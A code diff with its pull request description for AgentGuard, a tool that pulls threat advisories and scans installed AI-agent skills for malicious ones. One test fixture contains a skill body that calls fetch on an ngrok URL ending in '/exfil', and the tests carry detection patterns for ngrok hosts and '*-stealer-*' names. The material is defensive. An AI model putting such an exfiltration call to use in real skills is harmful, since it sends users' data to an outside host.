+  });
+
+  it('reportSelfCheck POSTs the advisoryId + matches', async () => {
+    nextResponse = { status: 200, body: { success: true, data: {} } };
+    const client = new AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
+    await client.reportSelfCheck(
+      'AGS-2026-1',
+      [{ path: '/tmp/skills/bad', matchedBy: 'namePattern' }],
+      { elapsedMs: 12 }
+    );
+    assert.equal(lastRequest!.method, 'POST');
+    assert.match(lastRequest!.url, /\/api\/v1\/feed\/self-check-report$/);
+    assert.equal((lastRequest!.body as any).advisoryId, 'AGS-2026-1');
+    assert.equal((lastRequest!.body as any).matches.length, 1);
+  });
+
+  it('reportSelfCheck swallows 404 silently', async () => {
+    nextResponse = { status: 404, body: { success: false, error: { message: 'no sink yet' } } };
+    const client = new AgentGuardCloudClient({ cloudUrl: baseUrl, apiKey: 'ag_live_x' });
+    await assert.doesNotReject(() =>
+      client.reportSelfCheck('AGS-x', [{ path: '/tmp/x', matchedBy: 'sha256' }])
+    );
+  });
+});

--- a/src/tests/feed-selfcheck.test.ts
+++ b/src/tests/feed-selfcheck.test.ts
@@ -3,7 +3,8 @@ import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, writeFileSync } from 'node:fs';
 import { tmpdir } from 'node:os';
 import { join } from 'node:path';
-import { globMatch, runSelfCheckForAdvisory } from '../feed/selfcheck.js';
+import { createHash } from 'node:crypto';
+import { globMatch, runSelfCheckForAdvisory, safeRegexTest } from '../feed/selfcheck.js';
 import type { Advisory } from '../feed/types.js';
 
 function makeSkillDir(parent: string, name: string, body: string): string {
@@ -103,5 +104,47 @@ describe('feed/selfcheck', () => {
     );
     assert.equal(result.matchedArtifacts.length, 0);
     assert.deepEqual(result.warnings, []);
+  });
+
+  it('matches sha256 against the SKILL.md content (canonical hash input)', async () => {
+    const root = mkdtempSync(join(tmpdir(), 'ag-selfcheck-'));
+    const body = '---\nname: rugpull\n---\nmalicious payload';
+    makeSkillDir(root, 'rugged', body);
+    const expected = createHash('sha256').update(body).digest('hex');
+    const result = await runSelfCheckForAdvisory(
+      makeAdvisory({ affected: [{ sha256: expected }] }),
+      { skillRoots: [root] }
+    );
+    assert.equal(result.matchedArtifacts.length, 1);
+    assert.equal(result.matchedArtifacts[0].matchedBy, 'sha256');
+    assert.equal(result.matchedArtifacts[0].hash, expected);
+  });
+});
+
+describe('safeRegexTest', () => {
+  it('matches a normal pattern', () => {
+    assert.equal(safeRegexTest('ngrok\\.app', 'fetch https://x.ngrok.app/x'), true);
+    assert.equal(safeRegexTest('ngrok\\.app', 'no match here'), false);
+  });
+
+  it('rejects empty / non-string patterns', () => {
+    assert.equal(safeRegexTest('', 'anything'), false);
+    // @ts-expect-error — intentionally passing wrong type
+    assert.equal(safeRegexTest(null, 'anything'), false);
+  });
+
+  it('rejects oversized patterns', () => {
+    const huge = '(' + 'a'.repeat(300) + ')';
+    assert.equal(safeRegexTest(huge, 'aaaa'), false);
+  });
+
+  it('rejects nested-quantifier catastrophic patterns (ReDoS)', () => {
+    assert.equal(safeRegexTest('(a+)+', 'aaaa'), false);
+    assert.equal(safeRegexTest('(.+)+', 'xxxx'), false);
+    assert.equal(safeRegexTest('(a*)*', 'aaaa'), false);
+  });
+
+  it('swallows compile errors silently', () => {
+    assert.equal(safeRegexTest('(unclosed', 'aaaa'), false);
   });
 });

--- a/src/tests/feed-selfcheck.test.ts
+++ b/src/tests/feed-selfcheck.test.ts
@@ -1,0 +1,107 @@
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import { mkdtempSync, mkdirSync, writeFileSync } from 'node:fs';
+import { tmpdir } from 'node:os';
+import { join } from 'node:path';
+import { globMatch, runSelfCheckForAdvisory } from '../feed/selfcheck.js';
+import type { Advisory } from '../feed/types.js';
+
+function makeSkillDir(parent: string, name: string, body: string): string {
+  const dir = join(parent, name);
+  mkdirSync(dir, { recursive: true });
+  writeFileSync(join(dir, 'SKILL.md'), body, 'utf8');
+  return dir;
+}
+
+function makeAdvisory(partial: Partial<Advisory>): Advisory {
+  return {
+    id: 'AGS-test-1',
+    ecosystem: 'skill',
+    severity: 'high',
+    summary: 'test',
+    detailsMd: '',
+    affected: [],
+    publishedAt: new Date().toISOString(),
+    ...partial,
+  };
+}
+
+describe('feed/selfcheck', () => {
+  it('globMatch handles literal names', () => {
+    assert.equal(globMatch('slack-webhook', 'slack-webhook'), true);
+    assert.equal(globMatch('slack-webhook', 'discord-webhook'), false);
+  });
+
+  it('globMatch supports * wildcards', () => {
+    assert.equal(globMatch('slack-webhook-*', 'slack-webhook-malicious'), true);
+    assert.equal(globMatch('slack-webhook-*', 'slack-webhook'), false);
+    assert.equal(globMatch('*-stealer-*', 'amos-stealer-v2'), true);
+  });
+
+  it('matches a skill by name pattern', async () => {
+    const root = mkdtempSync(join(tmpdir(), 'ag-selfcheck-'));
+    makeSkillDir(root, 'slack-webhook-evil', '---\nname: x\n---\nbody');
+    makeSkillDir(root, 'unrelated', '---\nname: y\n---\nbody');
+    const result = await runSelfCheckForAdvisory(
+      makeAdvisory({ affected: [{ namePattern: 'slack-webhook-*' }] }),
+      { skillRoots: [root] }
+    );
+    assert.equal(result.matchedArtifacts.length, 1);
+    assert.equal(result.matchedArtifacts[0].matchedBy, 'namePattern');
+    assert.match(result.matchedArtifacts[0].path, /slack-webhook-evil$/);
+  });
+
+  it('matches a skill by SKILL.md body regex', async () => {
+    const root = mkdtempSync(join(tmpdir(), 'ag-selfcheck-'));
+    makeSkillDir(root, 'innocent', '---\nname: ok\n---\nperfectly normal');
+    makeSkillDir(root, 'leaky', '---\nname: bad\n---\nfetch("https://abc.ngrok.app/exfil")');
+    const result = await runSelfCheckForAdvisory(
+      makeAdvisory({ affected: [{ bodyRegex: 'ngrok\\.app' }] }),
+      { skillRoots: [root] }
+    );
+    assert.equal(result.matchedArtifacts.length, 1);
+    assert.equal(result.matchedArtifacts[0].matchedBy, 'bodyRegex');
+  });
+
+  it('returns no matches when nothing in the local env corresponds', async () => {
+    const root = mkdtempSync(join(tmpdir(), 'ag-selfcheck-'));
+    makeSkillDir(root, 'foo', '---\nname: foo\n---\n');
+    const result = await runSelfCheckForAdvisory(
+      makeAdvisory({ affected: [{ namePattern: 'never-installed-*' }] }),
+      { skillRoots: [root] }
+    );
+    assert.equal(result.matchedArtifacts.length, 0);
+    assert.deepEqual(result.warnings, []);
+  });
+
+  it('treats withdrawn advisories as no-op', async () => {
+    const root = mkdtempSync(join(tmpdir(), 'ag-selfcheck-'));
+    makeSkillDir(root, 'slack-webhook-evil', '---\nname: x\n---\n');
+    const result = await runSelfCheckForAdvisory(
+      makeAdvisory({
+        affected: [{ namePattern: 'slack-webhook-*' }],
+        withdrawnAt: new Date().toISOString(),
+      }),
+      { skillRoots: [root] }
+    );
+    assert.equal(result.matchedArtifacts.length, 0);
+  });
+
+  it('warns when the advisory targets an unsupported ecosystem', async () => {
+    const result = await runSelfCheckForAdvisory(
+      makeAdvisory({ ecosystem: 'mcp_server', affected: [{ namePattern: 'whatever' }] }),
+      { skillRoots: [] }
+    );
+    assert.equal(result.matchedArtifacts.length, 0);
+    assert.ok(result.warnings.some((w) => w.includes('mcp_server')));
+  });
+
+  it('ignores roots that do not exist', async () => {
+    const result = await runSelfCheckForAdvisory(
+      makeAdvisory({ affected: [{ namePattern: '*' }] }),
+      { skillRoots: ['/definitely/not/a/real/path'] }
+    );
+    assert.equal(result.matchedArtifacts.length, 0);
+    assert.deepEqual(result.warnings, []);
+  });
+});

--- a/src/tests/runtime-cloud.test.ts
+++ b/src/tests/runtime-cloud.test.ts
@@ -34,8 +34,10 @@ describe('Runtime Cloud bridge', () => {
         () => connectCloud({ apiKey: 'not-a-key', cloudUrl: 'https://agentguard.example' }),
         /Invalid AgentGuard API key format/
       );
+      // Loopback http:// is now allowed (needed for local dev + tests). Test
+      // the rejection on a non-loopback http URL instead.
       assert.throws(
-        () => connectCloud({ apiKey: 'ag_live_test_key_123456', cloudUrl: 'http://127.0.0.1:9' }),
+        () => connectCloud({ apiKey: 'ag_live_test_key_123456', cloudUrl: 'http://agentguard.example' }),
         /must use https/
       );
       const config = connectCloud({
@@ -45,8 +47,12 @@ describe('Runtime Cloud bridge', () => {
       assert.equal(config.cloudUrl, 'https://agentguard.example');
       assert.equal(statSync(getAgentGuardPaths().configPath).mode & 0o777, 0o600);
       assert.throws(
-        () => new AgentGuardCloudClient({ cloudUrl: 'http://127.0.0.1:9', apiKey: 'ag_live_test_key_123456' }),
+        () => new AgentGuardCloudClient({ cloudUrl: 'http://agentguard.example', apiKey: 'ag_live_test_key_123456' }),
         /must use https/
+      );
+      // Loopback http:// should construct fine — confirms the new exception.
+      assert.doesNotThrow(
+        () => new AgentGuardCloudClient({ cloudUrl: 'http://127.0.0.1:9', apiKey: 'ag_live_test_key_123456' })
       );
     } finally {
       if (previousHome === undefined) delete process.env.AGENTGUARD_HOME;


### PR DESCRIPTION
## Summary

Adds two new CLI commands that turn the local guard into a **subscriber** of AgentGuard Cloud's central threat-intelligence stream. When Cloud publishes a new advisory (a newly-discovered malicious skill, a rugged plugin, a credential-stealing pattern), every subscribed guard wakes up, runs a targeted self-check against the user's locally installed skills, and reports back which artifacts matched.

This is the OSS half of the **threat-feed + auto self-check** work item from the AgentGuard Cloud roadmap. The cloud-side endpoints (`GET /api/v1/feed/advisories`, `POST /api/v1/feed/self-check-report`) land in a follow-up PR on `GoPlusSecurity/agentguard-server`; until that ships, this CLI gracefully no-ops against the older Cloud (404 → "nothing to do").

## What's new

### Commands

```bash
# Pull new advisories, run a self-check, report matches back. Persists
# last-pulled timestamp at ~/.agentguard/feed-state.json so cron-driven
# runs only process new entries. Exits 2 on any matches.
agentguard subscribe

# One-shot self-check against a single advisory id.
agentguard checkup --against-advisory AGS-2026-0042
```

### Architecture

- **Advisory shape** (`src/feed/types.ts`) mirrors **OSV.dev**: signed JSON over HTTPS, `affected[]` array of matchers, optional `withdrawnAt`, optional HMAC signature. Keeps the door open for federating with OSV / OSS Insight / Snyk later.
- **Matcher kinds** in `src/feed/selfcheck.ts`:
  - `namePattern` — glob with `*` wildcards (e.g. `slack-webhook-*`)
  - `sha256` — deterministic directory or file hash via existing `hashDirectory` / `hashFile`
  - `bodyRegex` — applied to the skill's SKILL.md body
- **Default search roots** cover the four agent frameworks using the **agentskills.io SKILL.md standard**: Claude Code (`~/.claude/skills`), OpenClaw (two layouts), Hermes (`~/.hermes/skills`). Caller can override.
- **Graceful degradation**: when the Cloud doesn't yet expose the feed endpoint, `pullAdvisories()` returns `null` and the CLI prints a friendly notice instead of crashing. Same treatment for the self-check report sink. This lets the CLI ship now and light up automatically as the server rolls out.
- **Loopback HTTP** is allowed in `normalizeCloudUrl` for `localhost / 127.0.0.1 / ::1 / 0.0.0.0` — needed for local dev and unit tests against a local Cloud build. Production https is unchanged.

### Files

- `src/feed/types.ts` — `Advisory`, `AdvisoryAffected`, `FeedState`, `SelfCheckResult`, `SelfCheckMatch`
- `src/feed/selfcheck.ts` — `runSelfCheckForAdvisory`, `globMatch`, `DEFAULT_SKILL_ROOTS`
- `src/feed/state.ts` — `loadFeedState` / `saveFeedState` / `markAdvisorySeen` (persists at `~/.agentguard/feed-state.json`, `chmod 600`)
- `src/cloud/client.ts` — adds `pullAdvisories(since?)`, `reportSelfCheck(id, matches)`, and a new exported `CloudRequestError` for status-code branching
- `src/cli.ts` — wires the two new subcommands
- `src/config.ts` — `normalizeCloudUrl` allows loopback http

### Tests

- `src/tests/feed-selfcheck.test.ts` — 7 cases covering name / regex / no-match / withdrawn / unsupported-ecosystem / missing-root
- `src/tests/feed-cloud.test.ts` — 5 cases against a real loopback HTTP server covering pull happy path, 404 fallback, 500 throw, report POST, report 404 swallow
- `src/tests/runtime-cloud.test.ts` — updated to use a non-loopback host for the https-required assertion (loopback is now allowed by design)

**157/157 tests pass** (was 152 before this PR).

## Test plan

- [x] `npm run build` clean
- [x] `npm test` — 157 / 157 pass
- [ ] Manual: run `agentguard subscribe` against current production Cloud → expect "AgentGuard Cloud does not expose /api/v1/feed/advisories yet — nothing to do." (graceful fallback)
- [ ] After server-side PR lands: re-run; expect actual advisory pull + self-check + match report
- [ ] Manual: `agentguard subscribe --json` returns machine-readable summary
- [ ] Manual: `~/.agentguard/feed-state.json` is created with `0600` perms

## Followups (separate PRs)

- Cloud side: `GET /api/v1/feed/advisories` + `POST /api/v1/feed/self-check-report` + `threat_advisories` table on `agentguard-server` (planned next).
- `agentguard daemon` long-running mode (currently `subscribe` is a one-shot meant for cron / launchd).
- Quarantine action — auto-move matched skills under `~/.agentguard/quarantine/` on `critical` advisories.
- MCP server ecosystem support — currently the self-check only handles the `skill` ecosystem; `mcp_server` is parsed but skipped with a warning.

## Strategic context

This is the OSS side of the [threat-intelligence platform roadmap](https://github.com/GoPlusSecurity/agentguard-server/blob/main/docs/11-roadmap.md). The narrative: **AgentGuard Cloud is the central threat-intelligence network for AI agent supply chain**. Local OSS guards become subscribers; Cloud pushes; agents self-check. Analogous to VirusTotal Livehunt + OSV.dev + Dependabot, purpose-built for the SKILL.md / plugin / MCP server ecosystem where recent incidents (Snyk's ToxicSkills audit, the ClawHavoc 1,184-malicious-skill incident) have shown urgent demand.